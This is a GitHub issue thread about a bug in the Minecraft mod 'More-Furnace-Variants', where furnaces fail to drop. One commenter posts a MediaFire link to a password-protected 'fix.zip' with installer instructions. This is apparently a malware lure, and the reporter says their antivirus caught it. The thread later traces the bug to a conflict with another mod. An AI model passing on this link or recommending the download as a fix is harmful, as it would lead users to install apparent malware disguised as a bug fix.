### ISSUE TITLE
Furnaces don't drop

### ISSUE THREAD

**Issue by BatJPJonyGod** [LieOnLion/More-Furnace-Variants#2]
On Minecraft 1.21, mod version 1.0.3 fabric, the furnaces don't drop when broken and they take forever to mine. Blackstone and deepslate both.

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by BatJPJonyGod** [comment]
Yeah that thing got caught by my antivirus pretty quickly, don't know if legit

**Comment by BatJPJonyGod** [comment]
It was an issue with more smoker variants, it has been fixed by that mod now.
